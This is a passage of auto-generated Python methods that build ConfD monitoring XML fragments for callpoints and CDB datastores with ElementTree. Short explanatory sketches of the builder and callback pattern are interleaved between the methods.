notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name = ET.SubElement(notification_stream_replay, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_replay_support(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
replay_support = ET.SubElement(notification_stream_replay, "replay-support")
replay_support.text = kwargs.pop('replay_support')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
# The stream 'name' key was already popped above, so the daemon name must
# use a distinct kwarg; a second kwargs.pop('name') would raise KeyError.
name.text = kwargs.pop('daemon_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # presence-only (empty) leaf; no text value to set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
# The stream 'name' key was already popped above, so the daemon name must
# use a distinct kwarg; a second kwargs.pop('name') would raise KeyError.
name.text = kwargs.pop('daemon_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
file_container = ET.SubElement(registration_type, "file")
file_leaf = ET.SubElement(file_container, "file")
file_leaf.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
error = ET.SubElement(notification_stream_replay, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
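# Every generated builder above follows the same shape: build a <config> root,
# add the namespaced <confd-state> container, walk down the YANG path, set the
# leaf text, and hand the fragment to a callback. A standalone sketch of that
# pattern (the helper name and the serialization step are illustrative, not
# part of the generated class):

```python
import xml.etree.ElementTree as ET

def build_notification_stream_replay_error(name, error):
    # Mirrors the generated builders: <config> root, namespaced
    # <confd-state>, then the nested path down to the target leaf.
    config = ET.Element("config")
    confd_state = ET.SubElement(
        config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
    internal = ET.SubElement(confd_state, "internal")
    callpoints = ET.SubElement(internal, "callpoints")
    stream = ET.SubElement(callpoints, "notification-stream-replay")
    ET.SubElement(stream, "name").text = name    # list key
    ET.SubElement(stream, "error").text = error  # target leaf
    return ET.tostring(config, encoding="unicode")

xml = build_notification_stream_replay_error("stream0", "replay failed")
```

# Serializing with ET.tostring stands in for whatever the real callback does
# with the fragment (e.g. sending it over NETCONF).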
def confd_state_internal_callpoints_authentication_callback_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
enabled = ET.SubElement(authentication_callback, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
id_leaf = ET.SubElement(daemon_entry, "id")
id_leaf.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
name = ET.SubElement(daemon_entry, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
error = ET.SubElement(daemon_entry, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_elem = ET.SubElement(registration_type, "range")
path = ET.SubElement(range_elem, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
lower = ET.SubElement(range_inner, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
upper = ET.SubElement(range_inner, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
default = ET.SubElement(range_inner, "default")  # presence leaf: created empty, no text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
id_leaf = ET.SubElement(daemon, "id")
id_leaf.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
file_container = ET.SubElement(registration_type, "file")
file_leaf = ET.SubElement(file_container, "file")
file_leaf.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
error = ET.SubElement(authentication_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
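# Each generated method ends with kwargs.pop('callback', self._callback), so a
# caller can override delivery per call while the instance-wide default handles
# the common case. A minimal self-contained sketch of that dispatch (the class
# and method names here are hypothetical stand-ins, not the generated API):

```python
import xml.etree.ElementTree as ET

class CallbackSketch:
    # Stand-in for the generated class, showing the per-call
    # callback override falling back to the instance default.
    def _callback(self, config):
        # default delivery: serialize the XML fragment
        return ET.tostring(config, encoding="unicode")

    def authentication_callback_error(self, **kwargs):
        config = ET.Element("config")
        ET.SubElement(config, "error").text = kwargs.pop('error')
        callback = kwargs.pop('callback', self._callback)
        return callback(config)

s = CallbackSketch()
default_result = s.authentication_callback_error(error="denied")
leaf_text = s.authentication_callback_error(
    error="denied", callback=lambda cfg: cfg.find("error").text)
```

# Passing callback=... receives the raw Element tree, so a caller can inspect
# or post-process the fragment instead of using the default serialization.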
def confd_state_internal_callpoints_authorization_callbacks_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
enabled = ET.SubElement(authorization_callbacks, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
id_leaf = ET.SubElement(daemon_entry, "id")
id_leaf.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
name = ET.SubElement(daemon_entry, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon_container = ET.SubElement(registration_type, "daemon")
daemon_entry = ET.SubElement(daemon_container, "daemon")
error = ET.SubElement(daemon_entry, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_elem = ET.SubElement(registration_type, "range")
path = ET.SubElement(range_elem, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
lower = ET.SubElement(range_inner, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
upper = ET.SubElement(range_inner, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
default = ET.SubElement(range_inner, "default")  # presence leaf: created empty, no text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
id_leaf = ET.SubElement(daemon, "id")
id_leaf.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range_outer = ET.SubElement(registration_type, "range")
range_inner = ET.SubElement(range_outer, "range")
daemon = ET.SubElement(range_inner, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
file_container = ET.SubElement(registration_type, "file")
file_leaf = ET.SubElement(file_container, "file")
file_leaf.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
error = ET.SubElement(authorization_callbacks, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name = ET.SubElement(datastore, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_transaction_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
transaction_id = ET.SubElement(datastore, "transaction-id")
transaction_id.text = kwargs.pop('transaction_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
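# The cdb/datastore methods target a YANG keyed list: the <name> key leaf is
# emitted first so the sibling leaf addresses the correct <datastore> entry.
# A standalone sketch of that keyed-entry pattern (the helper name and the
# sample values are illustrative, not part of the generated class):

```python
import xml.etree.ElementTree as ET

def datastore_leaf(name, leaf_tag, value):
    # Generated pattern for a keyed list entry: key leaf first,
    # then the target leaf, both children of the same <datastore>.
    config = ET.Element("config")
    confd_state = ET.SubElement(
        config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
    cdb = ET.SubElement(ET.SubElement(confd_state, "internal"), "cdb")
    datastore = ET.SubElement(cdb, "datastore")
    ET.SubElement(datastore, "name").text = name     # list key
    ET.SubElement(datastore, leaf_tag).text = value  # target leaf
    return config

root = datastore_leaf("running", "transaction-id", "1422-1-1")
entry = root.find("confd-state/internal/cdb/datastore")
```

# The plain find() path works here because the xmlns is carried as a literal
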